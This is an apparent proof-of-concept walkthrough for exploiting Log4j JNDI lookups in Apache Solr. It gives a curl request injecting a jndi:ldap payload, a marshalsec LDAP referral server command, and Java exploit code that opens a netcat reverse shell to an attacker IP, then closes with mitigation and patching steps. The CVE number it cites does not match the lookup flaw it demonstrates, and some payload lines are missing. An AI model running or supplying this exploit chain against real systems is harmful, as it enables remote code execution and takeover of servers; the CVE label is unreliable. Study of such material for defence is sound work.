# log4j exploitation Proof Of Concept

CVE: [CVE-2021-45105](

### Theory
- The log4j packet can interpretate some actions in a variable

For eg:

=> This payload invokes some functionalities from `JNDI` (Java Naming and Directory Interface).
=> `ldap://` means that the target will reach a remote endpoint, with the LDAP protocol.
=> `ATTACKERCONTROLLEDHOST` means that the target will create an external connection (for get a shell).

 ##### - this syntax will be written everywere the application save some data. -
- for eg: Input boxes, user and password login forms, data entry points within applications
HTTP headers such as User-Agent, X-Forwarded-For, or other customizable headers.

=> There are a lot of bypass of the malicius payload, like this:







### Pactice
In this example, we'll inject the previus mlicius code into the target and we'll get a response on the attacker machine.
After that, we'll get a shell.

###### Get the request
=> Setup a listener: 
=> Send a simple `GET` request:
curl 'http://[VULNERABLE HOST]:[VULNERABLE PORT]/solr/admin/cores?foo=$\{jndi:ldap://[ATTACKER IP]:[LISTENER PORT]\}'

###### Get a shell

We'll use a Open-Source repository for setup a `LDAP Referral Server`, that will be used for
	redirect the initial request to another position, where it's possible to store a secondary payload.	
	This payload will execute garant to us a RCE.
- Payload (reach the attacker server):

- The vuln. server will redirect this request to a secondary `http://attackerserver/resource`.
- The victim retrieves and executes the code present in `http://attackerserver/resource`.

##### - we'll need Java8 on the our machine. -
Start the LDAP server
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://[ATTACKER IP]:8000/#Exploit"

We'll craft the secondary payload in Java.
- Code:
public class Exploit {
	static {
		try {
			java.lang.Runtime.getRuntime().exec("nc -e /bin/bash [ATTACKER IP] [LISTENING PORT]"); 
		} catch (Exception e) {

- Shell part: `nc -e /bin/bash [ATTACKER IP] [LISTENING PORT]`.

- Compile the payload:
javac -source 8 -target 8

And, after that, in the same folder, open the python web server:
python3 -m http.server

- An example of the exploit execution.


### Mitigation

With the root privileges add this string to the `/etc/default/` file:
- string: `SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"`
- restart the service:
systemctl restart solr

And re-try to execute the exploit, it won't do any request to the your IP. 
(setup the listener at the same port (like before), and re-execute the "curl" command).

### Patching
Patch `logging-log4j` package to version `2.16.0` or higher.

Download the release [here]([](